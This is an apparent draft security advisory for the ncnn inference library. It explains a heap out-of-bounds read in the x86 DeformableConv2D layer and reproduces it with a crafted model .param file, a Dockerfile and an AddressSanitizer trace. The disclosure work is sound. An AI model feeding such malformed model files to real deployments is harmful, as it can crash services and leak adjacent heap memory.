All advisories
Draft

Heap Out-of-Bounds Read in x86 DeformableConv2D

Tencent/ncnn

Affected packages

ncnn other
Affected versions= 5e66f094bf7c597b4569cc014a8be84104748678
Patched versionsNot specified

Description

Heap Out-of-Bounds Read in x86 DeformableConv2D

Affected commit: 5e66f094bf7c597b4569cc014a8be84104748678
Sink: src/layer/x86/gemm_x86.cpp:2167 in transpose_pack_B_tile
Sanitizer verdict: heap-buffer-overflow

Summary

DeformableConv2D_x86 configures its inner GEMM with a K derived from the .param file's weight_data_size, while the im2col buffer that GEMM reads is allocated from the runtime tensor's channel count. A model that declares 100 weights for a single-channel 1x1 convolution makes GEMM walk 100 rows of a 4-float buffer, crashing ncnnoptimize and feeding adjacent heap data into the packed B tile. The entry point is ncnnoptimize <param> <bin> ... via ModelWriter::shape_inference().

Detail

DeformableConv2D_x86::create_pipeline() computes num_input by dividing the declared weight_data_size by the kernel size and num_output, and pushes maxk * num_input into the child Gemm layer as K. forward() builds bottom_im2col from bottom_blob.c, the real channel count, so the two disagree whenever the declared weight count does not match the graph.

// src/layer/x86/deformableconv2d_x86.cpp:79
    int num_input = weight_data_size / kernel_size / num_output;

// src/layer/x86/deformableconv2d_x86.cpp:114
        pd.set(9, maxk * num_input);    // K = maxk*inch

// src/layer/x86/deformableconv2d_x86.cpp:247
        Mat bottom_im2col(size, maxk * channels, elemsize, elempack, opt.workspace_allocator);

// src/layer/x86/gemm_x86.cpp:2160
        if (elempack == 1)
        {
            const float* p0 = (const float*)B + k * B_hstep + (j + jj);

            int kk = 0;
            for (; kk < max_kk; kk++)
            {
                pp[0] = p0[0];
                pp += 1;
                p0 += B_hstep;
            }
        }

The PoC generates DeformableConv2D dc 2 1 data offset out 0=1 1=1 5=0 6=100 over a 1x1x1 input: kernel_size = 1, num_output = 1, weight_data_size = 100, so num_input = 100 and the GEMM is told K = 100. Meanwhile channels = 1, size = outw * outh = 1, so bottom_im2col is a 1x1 Mat — 4 real floats after cstep rounding, giving the 84-byte allocation in the report.

transpose_pack_B_tile receives that Mat as B with B_hstep = 1 and iterates max_kk (up to the declared K = 100) rows, advancing p0 by one float each step. The first index outside the allocation is p0 at byte offset 84, i.e. kk == 21, matching READ of size 4 ... 0 bytes after 84-byte region. Neither create_pipeline() nor forward() checks the declared num_input against bottom_blob.c * bottom_blob.elempack.

Reproduce

Build and run (writes the Dockerfile, builds ncnn with ASan, runs the PoC)
mkdir -p ncnn-poc-heap-out-of-bounds-read-in-x86-deformableconv2d && cd ncnn-poc-heap-out-of-bounds-read-in-x86-deformableconv2d

cat > Dockerfile <<'DOCKERFILE'
FROM ubuntu:24.04

RUN apt-get update && apt-get install -y --no-install-recommends \
      git ca-certificates g++ cmake make python3 python3-pip python3-numpy \
      protobuf-compiler libprotobuf-dev \
 && pip3 install --no-cache-dir --break-system-packages onnx protobuf \
 && rm -rf /var/lib/apt/lists/*

RUN git clone --depth 1 https://github.com/Tencent/ncnn.git /ncnn

WORKDIR /ncnn
RUN cmake -S . -B build \
      -DCMAKE_BUILD_TYPE=Debug \
      -DCMAKE_C_FLAGS="-O0 -g -fsanitize=address" \
      -DCMAKE_CXX_FLAGS="-O0 -g -fsanitize=address" \
      -DCMAKE_EXE_LINKER_FLAGS="-fsanitize=address" \
      -DNCNN_BUILD_TOOLS=ON -DNCNN_BUILD_EXAMPLES=ON -DNCNN_BUILD_BENCHMARK=ON \
      -DNCNN_BUILD_TESTS=OFF -DNCNN_VULKAN=OFF -DNCNN_OPENMP=OFF \
 && cmake --build build -j"$(nproc)"

ENV ASAN_OPTIONS=detect_leaks=0
WORKDIR /poc
DOCKERFILE

cat > poc.param <<'EOF'
7767517
3 3
Input data 0 1 data 0=1 1=1 2=1
Input offset 0 1 offset 0=1 1=1 2=2
DeformableConv2D dc 2 1 data offset out 0=1 1=1 6=100
EOF

docker build -t ncnn-asan .
docker run --rm --network none -v "$PWD:/poc" ncnn-asan \
  /ncnn/build/tools/ncnnoptimize poc.param null out.param out.bin 0

AddressSanitizer output:

==1==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x50e000000254 at pc 0x61c64f8437a1 bp 0x7ffed0784430 sp 0x7ffed0784420
READ of size 4 at 0x50e000000254 thread T0
    #0 0x61c64f8437a0 in transpose_pack_B_tile /ncnn/build/src/layer/x86/gemm_x86_avx512.cpp:2167
    #1 0x61c64f8bb940 in gemm_AT_x86 /ncnn/build/src/layer/x86/gemm_x86_avx512.cpp:7133
    #2 0x61c64f8ef6ed in ncnn::Gemm_x86_avx512::forward(std::vector<ncnn::Mat, std::allocator<ncnn::Mat> > const&, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/build/src/layer/x86/gemm_x86_avx512.cpp:7785
    #3 0x61c64f3c91b7 in ncnn::Gemm::forward(ncnn::Mat const&, ncnn::Mat&, ncnn::Option const&) const /ncnn/src/layer/gemm.cpp:752
    #4 0x61c651d5c0eb in ncnn::DeformableConv2D_x86_avx512::forward(std::vector<ncnn::Mat, std::allocator<ncnn::Mat> > const&, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/build/src/layer/x86/deformableconv2d_x86_avx512.cpp:569
    #5 0x61c6491f770b in ncnn::NetPrivate::do_forward_layer(ncnn::Layer const*, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/src/net.cpp:856
    #6 0x61c6491dfb7f in ncnn::NetPrivate::forward_layer(int, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/src/net.cpp:167
    #7 0x61c64923f9e9 in ncnn::Extractor::extract(int, ncnn::Mat&, int) /ncnn/src/net.cpp:2939
    #8 0x61c6490d13c0 in ModelWriter::shape_inference() /ncnn/tools/modelwriter.h:435
    #9 0x61c64914eeee in main /ncnn/tools/ncnnoptimize.cpp:2844
    #10 0x7eec666171c9  (/lib/x86_64-linux-gnu/libc.so.6+0x2a1c9) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
    #11 0x7eec6661728a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2a28a) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
    #12 0x61c6490ce624 in _start (/ncnn/build/tools/ncnnoptimize+0x2a1624) (BuildId: b1911b1bfb480c5a294bfb9d0e0f7bbde3aaf530)

0x50e000000254 is located 0 bytes after 84-byte region [0x50e000000200,0x50e000000254)
allocated by thread T0 here:
    #0 0x7eec66c90f1d in posix_memalign ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:145
    #1 0x61c64916368e in fastMalloc /ncnn/src/allocator.h:62
    #2 0x61c64916368e in ncnn::PoolAllocator::fastMalloc(unsigned long) /ncnn/src/allocator.cpp:159
    #3 0x61c6491a24b8 in ncnn::Mat::create(int, int, unsigned long, int, ncnn::Allocator*) /ncnn/src/mat.cpp:539
    #4 0x61c651d48703 in ncnn::Mat::Mat(int, int, unsigned long, int, ncnn::Allocator*) /ncnn/src/mat.h:965
    #5 0x61c651d48703 in ncnn::DeformableConv2D_x86_avx512::forward(std::vector<ncnn::Mat, std::allocator<ncnn::Mat> > const&, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/build/src/layer/x86/deformableconv2d_x86_avx512.cpp:247
    #6 0x61c6491f770b in ncnn::NetPrivate::do_forward_layer(ncnn::Layer const*, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/src/net.cpp:856
    #7 0x61c6491dfb7f in ncnn::NetPrivate::forward_layer(int, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/src/net.cpp:167
    #8 0x61c64923f9e9 in ncnn::Extractor::extract(int, ncnn::Mat&, int) /ncnn/src/net.cpp:2939
    #9 0x61c6490d13c0 in ModelWriter::shape_inference() /ncnn/tools/modelwriter.h:435
    #10 0x61c64914eeee in main /ncnn/tools/ncnnoptimize.cpp:2844
    #11 0x7eec666171c9  (/lib/x86_64-linux-gnu/libc.so.6+0x2a1c9) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
    #12 0x7eec6661728a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2a28a) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
    #13 0x61c6490ce624 in _start (/ncnn/build/tools/ncnnoptimize+0x2a1624) (BuildId: b1911b1bfb480c5a294bfb9d0e0f7bbde3aaf530)

SUMMARY: AddressSanitizer: heap-buffer-overflow /ncnn/build/src/layer/x86/gemm_x86_avx512.cpp:2167 in transpose_pack_B_tile

Credit

Zheng Yu @ DepthFirst